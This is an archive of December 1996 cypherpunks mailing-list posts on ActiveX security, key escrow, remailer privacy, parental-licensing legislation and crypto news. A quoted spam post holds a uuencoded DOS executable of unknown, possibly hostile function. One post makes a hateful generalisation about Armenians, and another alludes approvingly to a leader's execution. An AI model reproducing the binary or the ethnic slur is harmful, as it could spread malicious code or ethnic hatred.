>I agree 100%.  The intent of my comments was that such security *is*
>possible, but it's not available in widely deployed mass-market OS's.
>I'd love to hear feedback to the contrary, but it seems to me that it's
>extremely difficult to layer that type of security onto an existing system.

It depends on the level of compatibility you need.  If you need bug-for-bug
compatibility, then you get the security bugs too.  The only advantage you
have is being able to run two "systems" on one set of hardware.

If you allow some non-compatibilities, then things get better.  We had a
Unix running on KeyKOS which would run much of the Unix functionality.  For
example, we ran a number of the X demos.  On our IBM/370 version, we ran
IBM's CMS system with binary compatibility.  We used it for our development
environment, including editing, source management, compiling etc.  (There
was one IBM product we did not run.  It needed to read real-addresses to
grunge through system control blocks we hadn't emulated.  Since it had no
interface documentation, we would have had to look at its accesses, figure
out what it wanted, and simulate it.  Too much work for what was a pretty
bad product.)

If I was writing a Netscape implementation for KeyKOS, I would run Java
Applets in a separate protection domain because it would be relatively easy.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 16 Dec 1996 23:24:03 -0800 (PST)
To: Walt Armour <cme@cybercash.com>
Subject: RE: 40 bit DES [Was:Re: !! Point 'n Crypt]
Message-ID: <1.5.4.32.19961217072328.003c3a8c@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Walt Armour <walt@blarg.net> wrote:
> If I encrypt a $10 million dollar proposal and then get 86'd in 
> a car accident I would like to go to my grave knowing that the 
> company could get the proposal back.  ....

Anyone who stores a $10m proposal on only one machine, 
without making backups on somebody else's machine, preferably
out of the building, is asking for the Clue Fairy to send him
disk drive gremlins and software from Bill Gates to scribble on his disk,
and his company should probably consider 86ing him before he
strikes again :-)

Slightly more seriously, there are certainly corporate reasons to
store backups of keys for important data, such as backup tapes
and communications.  GAK-style technology is the wrong level approach
for communications -  GAK-style access to keys is useless unless
you've also backed up the data, so if your corporate officers need
the data, give it to them encrypted with their own keys.
Similarly, if you want backup access to keys used to encrypt files, 
back up the keyrings, maybe using a secret-sharer if you want to require
multiple people to access the backup, or just have the backups of 
the files encrypted with the keys for the backup server. 

> BUT in regards to the general populace, I do not advocate any form of 
> key escrow/recovery.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Mon, 16 Dec 1996 23:29:15 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: permanent invasion of privacy
Message-ID: <01BBEBA9.4DE87160@king1-12.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	attila

	In his Society essay, Lykken writes, "I will testify in
	support of a parental licensure bill to be introduced
	at the next session of the Minnesota State Legislature.
...........................................................

Someone needs to remind this Senator Lykken what happened in Romania, when 
the beleaguered citizen-units finally took their 'noble', social 
engineering leader Ceausescu, put him up against a wall and shot him.

History could repeat itself.

Ah well, but really the most that this proposed bill would accomplish would 
be a lot of discussion and a lot of attention being brought to the general 
awareness about where individuals stand relative to their *elected* 
government (in 4 years - out!).

Can you imagine the usenet discussions . . .all over the world.   You know, 
he could be doing everyone a favor by inciting fury in the savvy masses who 
would, in the process of complaining, educate the ignorant ones about the 
ethics of social engineering and the precautions against it, as well as 
about the character of people like this Senator.  A problem can be an 
opportunity in disguise!

    ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 16 Dec 1996 20:34:41 -0800 (PST)
To: Blake Coverett <blake@bcdev.com>
Subject: RE: Securing ActiveX.
In-Reply-To: <01BBEB6C.A6148AA0@bcdev.com>
Message-ID: <Pine.SUN.3.91.961216232723.19927A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Dec 1996, Blake Coverett wrote:

> This thread branch seems to be based on bad assumption.  Why would
> one want to run ActiveX controls in a sandbox?  If you need a sandbox,
> use a Java applet, if you need native code level access to the system
> use ActiveX.

To prevent ActiveX controls from formatting your hard drive while still 
being able to run native code to do fast DES cracking, why else?  
Sandbox!=Virtual CPU emulator.  Sandboxes work at the supervisor/user CPU 
level deciding which calls are cool and which will result in a core dump.

...

> Digitally signed code, a la ActiveX, is another approach to the same problem.  
> If the digital signatures and infrastructure around them are sound, which they 
> appear to be for ActiveX, this is also a useful solution.  The built-in gotcha 
> with this model is the all or nothing nature, either I trust the software publisher 

Viruses can sneak into software.  Given enough time you will see them 
sneak into compilers which will then happily create virus infected or 
trojan loaded controls which will be happily signed.  I'll leave the test 
of that scenario up to your imagination.  There were cases of viruses 
making their way to production distributed disks back a few years ago 
because people weren't watching carefully enough.

Or you may find that shareware control authors won't bother to sign their
controls, etc...  Same situation.  At some point trust or no trust, once
your hard drive is wiped, so is the record of the signature that says "The
last control you downloaded came from XYZ.com and was written by Vulis." 

> An equivalent Unix problem would be to allow an open-access guest
> account with the ability to transfer in and execute arbitrary binaries.
> While doing this securely may be possible in theory I don't think the 
> state of the art is up to it today.  (I sure wouldn't allow it on my system.)

Right, so if that's the case, why would you allow ActiveX controls to run 
on your system?  It's the same problem whether signed or not as 
signatures only tell you the author's identity and not much else.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 16 Dec 1996 20:39:14 -0800 (PST)
To: Nelson Minar <nelson@media.mit.edu>
Subject: Re: Securing ActiveX.
In-Reply-To: <cpa7mmi2jsc.fsf@hattrick.media.mit.edu>
Message-ID: <Pine.SUN.3.91.961216233902.19927B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Dec 1996, Nelson Minar wrote:

> On Sat, 14 Dec 1996 ichudov@algebra.com wrote:
> >I do not understand how one can secure ActiveX.
> 
> Me neither! But the approach of requiring code signatures so you can
> at least break the fingers of whomever damaged your machine does have
> some merit.

And just where is this signature stored, hrmmm?  On your hard drive? Real 
useful when the log is stored somewhere the nasty program can earase, no?

Alternatively, a component can easily just modify your autoexec.bat to
install a time bomb or do other things and you won't recall that two
months ago you visited Billy Vulis's KOTM shop of spam.  When was the last
time you looked in your AUTOEXEC.BAT file? 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Douglas Barnes <cman@c2.net>
Date: Tue, 17 Dec 1996 00:17:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: File vs. Communication Key Escrow
Message-ID: <2.2.32.19961217081458.009cb230@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



Jumping on the bandwagon a bit here...

Walt makes a plausible business case for key escrow for software
that encrypts static information for archival purposes. 

Has anyone been able to come up with a good business case for
key escrow of communications keys? Note that if you're concerned
about communications history, that this is really just a special
case of static information that is archived.

Note that all key escrow proposals to date have focused almost
entirely on  "escrow" of keys used in communication. The recent
attempts to manufacture a business case for this by confusing
these two very different situations is part of the tactics we have
come to expect from the government when dealing with this issue.

If anything good can be said about the badly written, vague and
clearly unconstitutional new regulations from the Department of
Commerce, it's that they're less mealy-mouthed and weasling than
previous attempts to explicate the government position on 
cryptography.

At 11:23 PM 12/16/96 -0800, stewarts@ix.netcom.com wrote:
>Walt Armour <walt@blarg.net> wrote:
>> If I encrypt a $10 million dollar proposal and then get 86'd in 
>> a car accident I would like to go to my grave knowing that the 
>> company could get the proposal back.  ....
>
>Anyone who stores a $10m proposal on only one machine, 
>without making backups on somebody else's machine, preferably
>out of the building, is asking for the Clue Fairy to send him
>disk drive gremlins and software from Bill Gates to scribble on his disk,
>and his company should probably consider 86ing him before he
>strikes again :-)
>
>Slightly more seriously, there are certainly corporate reasons to
>store backups of keys for important data, such as backup tapes
>and communications.  GAK-style technology is the wrong level approach
>for communications -  GAK-style access to keys is useless unless
>you've also backed up the data, so if your corporate officers need
>the data, give it to them encrypted with their own keys.
>Similarly, if you want backup access to keys used to encrypt files, 
>back up the keyrings, maybe using a secret-sharer if you want to require
>multiple people to access the backup, or just have the backups of 
>the files encrypted with the keys for the backup server. 
>
>> BUT in regards to the general populace, I do not advocate any form of 
>> key escrow/recovery.
>
>#			Thanks;  Bill
># Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
># You can get PGP outside the US at ftp.ox.ac.uk
>#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
>#     so please Cc: me on replies.  Thanks.)
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Remailer Administrator <mix-admin@nym.alias.net>
Date: Mon, 16 Dec 1996 22:12:51 -0800 (PST)
Subject: IMPORTANT: Changes affecting anon.lcs.mit.edu privacy
Message-ID: <199612170612.BAA09244@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking into reconfiguring anon.lcs.mit.edu (a.k.a. nym.alias.net)
in ways that will improve performance and reliability.  This could
involve several changes (either temporary during testing, or even
permanent) that might affect the privacy of users.  I hope these
changes won't affect people who use anon.lcs.mit.edu and nym.alias.net
according to the instructions, but given the sensitive nature of
anonymous services, I want to alert people of these changes to avoid
any surprises.

 * 'Received:' headers may suddenly appear.  Currently,
   anon.lcs.mit.edu does not add 'Received:' headers to any mail it
   relays or delivers to nym.alias.net aliases.  Since the anonymous
   remailers mix@anon.lcs.mit.edu and config/send@nym.alias.net
   already strip header information upon receiving messages, this
   shouldn't really affect people unless they are telnetting to the
   SMPT port and forging E-mail.  Such forgeries are not condoned by
   the administrators, anyway, and have actually not been much of a
   problem.

   If, however, you were somehow relying on anon.lcs.mit.edu's
   sendmail for "light" anonymity, you should start using real
   remailers before it's too late.  Though I don't really mind
   suppressing Received: headers, this looks somewhat difficult to do
   with MTA's other than sendmail, so if sendmail gets junked, we may
   end up with something that adds Received headers.


 * SMTP destination statistics may be kept.  Recent versions of
   sendmail (and other MTA's) can keep statistics on delivery to
   remote machines, to prevent blocking multiple times when sending
   mail to unavailable remote hosts.  The information kept appears to
   be the name of each remote machine to which mail has been sent, and
   the last time at which an attempt to send mail to that host was
   made.  Such information would not be backed up, and could
   potentially be purged daily.

   I understand this may cause concern.  I welcome any feedback or
   suggestions on how to deal with this, either in sendmail or also
   qmail (which I'm thinking of switching to).  The worst case
   scenario seems to be the case where anon is seized or stolen and
   someone discovers that your machine received a piece of mail from
   it.  No information will be available about whether or not you ever
   sent mail to anon.lcs.mit.edu.  This seems acceptable because if
   someone really needed to prove you had received a piece of mail
   from nym.alias.net, that person could already do so by tapping your
   network and sending you a message through nym.alias.net.

Despite these changes, anon.lcs.mit.edu does not currently and will
never keep any message-by-message mail logs.  Sendmail currently runs
at log level 1, which the documentation describes as logging only
"Serious system failures and potential security problems."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcus Watts <mdw@umich.edu>
Date: Mon, 16 Dec 1996 22:34:17 -0800 (PST)
To: coderpunks@toad.com
Subject: Re: Army Cryptanalysis manual online
In-Reply-To: <3.0.32.19961216143128.00e39590@mail.eskimo.com>
Message-ID: <199612170634.BAA16798@quince.ifs.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Joel had written regarding:

> The US Army's Field Manual on Basic Cryptanalysis (FM 34-40-2), dated
> September 1990 is available for downloading as an Acrobat PDF file from:
> 
> http://www.atsc-army.org/cgi-win/$atdl.exe/fm/34-40-2/default.htm

There is now a more or less complete copy in:

	http://www.umich.edu/~umich/fm-34-40-2/

If I can find a copy of the acrobat viewer that works (I
downloaded an AIX version, only to discover that it doesn't
work under AIX 3.2.5.  Grrr.), I'll put a postscript version
up as well.

Unfortunately, as Joel notes, the original site is definitely both
slow and flakey - so I had to guess as to the order of all the
files...

				-Marcus Watts
				UM ITD PD&D Umich Systems Group




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Internaut <unde0275@frank.mtsu.edu>
Date: Tue, 17 Dec 1996 00:21:15 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Encryption to the poors
Message-ID: <01BBEBC0.E5C59500@s24-pm07.tnstate.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


When you send spam to a list like this, you're kinda asking for it, aren't you?

----------
From: 	Fuck@yourself.up[SMTP:Fuck@yourself.up]
Sent: 	Monday, December 16, 1996 07.35 PM
To: 	cypherpunks@toad.com
Subject: 	Encryption to the poors

>To: cypherpunks@toad.com
>From: Fuck@yourself.up
>Subject: Encryption to the poors
>
>Hey, i can doit to...
>RareTrip
>-------------------------------------->>CLIP<<---------------
>begin 644 greets.com
>MZPJ\3"<!40)2`98#OB8!B_Z+#@@!BQ8"`;AW`5#\K3/"JXO0XOA_R+8/>XT/
>M1XQW]#?&_D'\#TT,O5EX4\U\2(T/1XQ_]#^%K7]5@X4(__&!A@&4%7LJ14C1
>MWN^D>Z/9Y!C\43_,RS"R5JI(@ERBOU?^"/4G"@'KL`)-Z+!_-``N``!V`%P`
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M``````````````````````"_:KW4:+S3"[GUK,@^GMM)2PCU4;N[^!MY.WDX
>M>3A'\7022H4*2[_!('<KN[XZ>1IT,KFI"+N\3WEOOTR;:NFS3PY'N^/S49B[
>MWCIY&GD.>0Y!)RX'*Q\M'VD@=U:[PQMY.W0FN;T$N[!/>6^_!\HG^S**B5R[
>M6""_#L83>1V_"/GQ^<C&47E@>1]Y'WD8>1AY;E^97\PZ!"P?*1<O%VD@=RN[
>MOCIY&B:W7ZT.,;O'('D8#E.XIR._(<@,N[@Z>1IY;7EM#-@Z&`1=D@X`LG<:
>M``````````````````````````````````!7:0D<-V]S````````````````
>M````````````````````````````````````````````````````````````
>M````````````````````````````````````````````````````````````
>M````ZE>_5KA6N,<%>O![L,00@V#58Q(1I+[3#@`_\LDK`.A9@;#XZ,8!OOSR
>G6$NDN+L`N[D`N;H`NKT`O;X`OK\`OPX?``"RX4-!_[[X_A\JY]<`
>`
>end
>-------------------------------------->>CLIP<<---------------
>








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 17 Dec 1996 00:16:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Parolees limited from using computers, Internet
Message-ID: <01ID3MHIMI4GAELB3A@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Given exactly how big the Internet is for free speech, I'd call this
government interference in speech from those with a viewpoint in opposition
to its. I can see some restraints on speech in prison itself... but not
on someone who is supposedly safe enough to be let out, even under
supervision. (I would also point out that this ties into the action of drug
laws to cause the disenfranchisement of felony drug offenders. I see no
reason to suppose that felony drug offenders (as with any other crime that
shouldn't be one) would be any less competent to vote than the average,
everyday person (otherwise known as the average idiot)).
	-Allen

>   ______________________________________________________________________
>                         AT&T EasyCommerce Services
>           ZD Internet Magazine - Free For Wild Ass Net Pioneers
>   ______________________________________________________________________
>                    U.S. bans Internet use by some parolees
>  __________________________________________________________________________
>      Copyright (c) 1996 Nando.net
>      Copyright (c) 1996 Agence France-Presse
      
>   WASHINGTON (Dec 16, 1996 4:54 p.m. EST) - The U.S. government
>   announced Monday it will impose restrictions on parolees' use of the
>   Internet, saying it was responding to "increased criminal use" of the
>   worldwide computer network.
   
>   The United States Parole Commission said it was acting in response to
>   the "surge of 'how-to' information available on the Internet and other
>   computer online services relating to such offenses as child
>   molestation, hate crimes and the illegal use of explosives."
   
>   The restrictions include requiring a parolee to get prior written
>   approval from the commission to use information services such as an
>   Internet service provider.
   
[...]

>    Copyright (c) 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Mon, 16 Dec 1996 19:08:36 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: permanent invasion of privacy
Message-ID: <199612170310.UAA01366@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


        I'll pass the article along...  I'm not sure I wish to even 
    comment on the two social worker do-gooders who are proposing 
    [and have legislation introduced] something worse than Hillary's 
    "It take a global village" other than $E^&*&@!!!

        the absolute ultimate on invasion of privacy imaginable. might 
    as well add this one to: "...they get my weapon, still smoking, 
    from my cooling hand."   or maybe: "54-40 or fight"

        needless to say, any member of the cypherpunk list would be an 
    automatic loser in this game of life.  I for one believe ability 
    and drive is signicifantly more genetics than social environment.

        -attila 

  ==
  I'll get a life when it is proven
    and substantiated to be better
      than what I am currently experiencing.
            --attila

    **************  forwarded article  ****************

	LICENSING PARENTS REVISITED

	The December 1996 edition of the journal Society contains
	a symposium on the subject of "Licensing Parents" -- a
	totalitarian proposal with which regular readers of The
	New American may be familiar. (See "Whose Child Is This?"
	in our November 28, 1994 issue and "Are You Fit to Be a
	Parent? in our January 23, 1995 issue.) Included in the
	symposium were Dr. Jack C. Westman of the University of
	Wisconsin-Madison, author of Licensing Parents: Can We
	Prevent Child Abuse and Neglect? and Professor David T.
	Lykken of the University of Minnesota, author of The
	Antisocial Personalities. Westman and Lykken are the
	most prominent advocates of a system of parental
	licensure in which parents would have to be certified 
	"competent" by the government before being permitted to
	raise a child.

	In his Society essay, Lykken writes, "I will testify in
	support of a parental licensure bill to be introduced
	at the next session of the Minnesota State Legislature.
	The only sanction proposed in this bill for unlicensed
	parents who produce a child is periodic visits by child-
	protection caseworkers who will do an annual audit of
	each child's physical, social, and educational progress."
	However, Lykken asserts, "Minnesotans and their legislative
	representatives will [eventually] recognize the need to 
	take one further step. That step, I suggest, should be to 
	take custody of babies born to unlicensed mothers, before
	bonding occurs, and to place them for adoption or perma-
	nent care by professionally trained and supervised
	foster parents."

	Nor is this the last step that Lykken would take toward
	the abolition of parental authority by the state. The
	December 17, 1994 Minneapolis Star-Tribune reported,
	"Under Lykken's system, if children were born to un-
	licensed parents, the state would intervene immediately.
	Licenses would be checked in hospital maternity wards.
	Unlicensed parents would lose their children permanently.
	Adoptions would be final and irreversible." Furthermore,
	according to Lykken, "Repeat offenders might be required
	to submit to an implant of Norplant [a surgical contra-
	ceptive] as a way to keep them from having another baby
	for five years."

Source: Insider Report, p.12
	The New American 
	December 23, 1996






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reinhold@world.std.com (Arnold G. Reinhold)
Date: Tue, 17 Dec 1996 03:11:33 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Hard to Tax Scenario
Message-ID: <v02130503aedc1b273b5c@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Re: Hal Finney's exegesis on Robin Hanson's scenario of Ann, virtual MD

>On the other hand, if tax evasion is nearly universally practiced,
>perhaps there are strong cultural pressures against turning someone in.
>

On the contrary, in a world of anonymous payments and nyms, there is a
significant value for connecting nyms and true names and, hence a thriving
market in any information that might lead to a connection.

Bounty hunters maintain an ongoing lifestyle analysis on every true person.
Hot lists of people whose visible consumption and reported work don't jive
circulate widely. Ann can't walk down the street in a new pair of shoes
without 5 people sending in an mpeg to claim the micro-payment. And she
lives in terror as she watches the offer price for info about her rise.

By the way, as a covert MD with a receptionist cover, whom does she date?

Arnold Reinhold






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 17 Dec 1996 07:09:21 -0800 (PST)
To: blanc <blancw@cnw.com>
Subject: Re: permanent invasion of privacy
In-Reply-To: <01BBEBA9.4DE87160@king1-12.cnw.com>
Message-ID: <32B6B75D.4E1D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


blanc wrote:
> From:   attila
>         In his Society essay, Lykken writes, "I will testify in
>         support of a parental licensure bill to be introduced
>         at the next session of the Minnesota State Legislature.

Since nobody mentioned it here, it should at least be mentioned:

There are a lot of children who would, given the opportunity, opt to get
the government involved in monitoring their home situation quite closely.

There are times when you're a child (for some of them) that you can't
feasibly contact the government to interfere, i.e., when the govt.
isn't listening, but, when you know they are listening, and you could
use their help (however intrusive), sometimes that's a whole lot better
than putting up with parents from hell.

It's noteworthy that not a single person on this list has looked at this
from the children's point of view, considering that there are *many* of
them who could use the extra help (albeit bad for parents).

> Someone needs to remind this Senator Lykken what happened in Romania, when
> the beleaguered citizen-units finally took their 'noble', social
> engineering leader Ceausescu, put him up against a wall and shot him.
> History could repeat itself.
> Ah well, but really the most that this proposed bill would accomplish would
> be a lot of discussion and a lot of attention being brought to the general
> awareness about where individuals stand relative to their *elected*
> government (in 4 years - out!).
> Can you imagine the usenet discussions . . .all over the world.   You know,
> he could be doing everyone a favor by inciting fury in the savvy masses who
> would, in the process of complaining, educate the ignorant ones about the
> ethics of social engineering and the precautions against it, as well as
> about the character of people like this Senator.  A problem can be an
> opportunity in disguise!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Fred B. Ringel" <fredr@rivertown.net>
Date: Tue, 17 Dec 1996 04:33:19 -0800 (PST)
To: pgp-fone@rivertown.net
Subject: Re: PGPfone contact server/PGP-Fone Registry
In-Reply-To: <1.5.4.32.19961217065155.003b5694@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.95.961217072402.6870E-100000@rivertown>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Dec 1996 stewarts@ix.netcom.com wrote:

>[From a discussion on pgp-fone@rivertown.net]
>>>> Is there any kind of server method people on this list use to meet up on
>>>>PGP fone???

	For those you want to meet up, I have placed a discussion/message
board on a web page I call the "PGP-Fone Registry" which allows you to
leave a message with your name, area code and local exchange on the web
site so others who then visit the page can look you up and e-mail you to
set up a time and place to "hook up" and use PGP-Fone. Its entirely
voluntary and simply a means to facilitate people finding others interested
in using the application. 

	The complaint I heard about PGP-Fone is there is no way to find
others to use it with. This is intended to help fill that gap if people so
who desire to use it can "advertise," or make known, their availability.

	Please leave your area code and first three digits of your number
in the *subject* header of the message. This facilitates quick browsing. I
will add a small search engine if the registry ever gets very large. 

	The URL is : http://pgp.rivertown.net/pgp-fone.

	Enjoy and kindly report back to the pgp-fone list any good or
problem experience using the pgp-fone application so we can all benefit
from your trials.

	Fred

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
Fred B. Ringel				Rivertown.Net
Systems Administrator			P.O. Box 532
and General Fixer-upper			Hastings, New York 10706
Voice/Fax/Support: 914.478.2885		Data: 914-478-4988
				
Westchester's Rivertown's Full Service Flat-Rate Internet Access Provider 
	E-mail "SEND-PGPKEY" in the Subject for my Public Key
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Tue, 17 Dec 1996 06:14:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Encryption to the poors
In-Reply-To: <01BBEBC0.E5C59500@s24-pm07.tnstate.campus.mci.net>
Message-ID: <199612171416.IAA18952@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

X-Folder:

In <01BBEBC0.E5C59500@s24-pm07.tnstate.campus.mci.net>, on 12/17/96 at 04:05 AM,
   Internaut <unde0275@frank.mtsu.edu> said:

>When you send spam to a list like this, you're kinda asking for it, aren't you?

Wan't to take any bets that it is the same little winnie that was doing this
shit the other day?? :(


- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
Tag-O-Matic: I'm an OS/2 developer...I don't NEED a life!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrabIY9Co1n+aLhhAQH39wP9EwFeK1OU60cJ7DZ51OQqhkIr7ef+W5x/
PVn7PvEzMAY4y0nFfnwhc1MtTAdJvnrlYZUsKy4Rc69nP51UasMudX3DF4Lpskg1
FZE3GmI6CX8gnFvUz08KdHUc21yUXCAqf6U6uxH+JQ6PLpkvcURDdAKWPaTBElYD
mlPDJaJuKzg=
=va6R
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 17 Dec 1996 05:50:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: TIS_sue
Message-ID: <1.5.4.32.19961217131004.006a82e4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


12-16-96:

"TIS' Key Recovery Technology First To Enable General Purpose 
Export For Very Strong Encryption"

  In a development that may signal the beginning of the end of the 
  long standing encryption export control controversy, TIS today 
  announced that products using very strong cryptography with its
  RecoverKey technology have been approved for general purpose 
  export control under new export regulations.

"Encryption - BSA tries new lobbying tack"

  BSA intends to abandon its efforts to negotiate with the Clinton 
  administration on encryption export rules and will instead lobby 
  Congress for new legislation. The best hope lies with Rep. Bob 
  Goodlatte who plans to reintroduce a House bill proposing the 
  relaxation of controls at the next session next month.

"U.S. Emissary on Cryptography to Keynote RSA Data Security
Conference"

  "The RSA Conference is an opportunity for me to provide some
  insights on my mission which includes fostering a consensus on
  the development of an international key management
  infrastructure," said Ambassador Aaron.

"Pretty Darn Private"

  PGP last week unveiled PGP Cookie Cutter, a browser plug-in that 
  lets users selectively block Web "cookies."

"Smart card-PC standard proposed"

  The eight documents of the joint specifications address three
  major areas: They provide an interface to card readers; establish
  a common programming interface and control mechanism; and
  maintain compatibility with existing devices, leveraging the
  ISO structure that has been set in place over the past decade. 
  Information is available on the Web at www.smartcardsys.com.

"Web Service Provider Attacked"

  A SYN-flood attack against WebCom knocked out more than 3,000 
  Web sites for 40 hours this weekend during the busiest 
  shopping season of the year.

-----

TIS_sue  (19 kb)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Dec 1996 06:27:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Securing ActiveX.
In-Reply-To: <Pine.SUN.3.91.961216232723.19927A-100000@beast.brainlink.com>
Message-ID: <L423yD32w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:
> Or you may find that shareware control authors won't bother to sign their
> controls, etc...  Same situation.  At some point trust or no trust, once
> your hard drive is wiped, so is the record of the signature that says "The
> last control you downloaded came from XYZ.com and was written by Vulis."

If you FTP an executable from the Internet which purports to be a "kewl"
encryption program, and instead it wipes out everything it has write
access to, then Ray Arachelian probably wrote it.

Armenians are murderous cowards. They killed over 2 million Moslems in
this century alone - mostly women and children.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Dec 1996 06:41:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Securing ActiveX.
In-Reply-To: <Pine.SUN.3.91.961216233902.19927B-100000@beast.brainlink.com>
Message-ID: <Vw53yD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:
> Alternatively, a component can easily just modify your autoexec.bat to
> install a time bomb or do other things and you won't recall that two
> months ago you visited Billy Vulis's KOTM shop of spam.  When was the last
> time you looked in your AUTOEXEC.BAT file?

Ray "Arsen" Arachelian, the associate network administrator at Earthweb,
continues to post lies about me. Who are Earthweb's other major clients,
besides the Museum of Natural History (yech, what an ugly Web site)?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 23 Dec 1996 12:07:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: clipper plans 4 sale (was Re: Earl Edwin Pitts, $224,000)
In-Reply-To: <v03007800aede52a753c9@[207.167.93.63]>
Message-ID: <199612170946.JAA00429@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



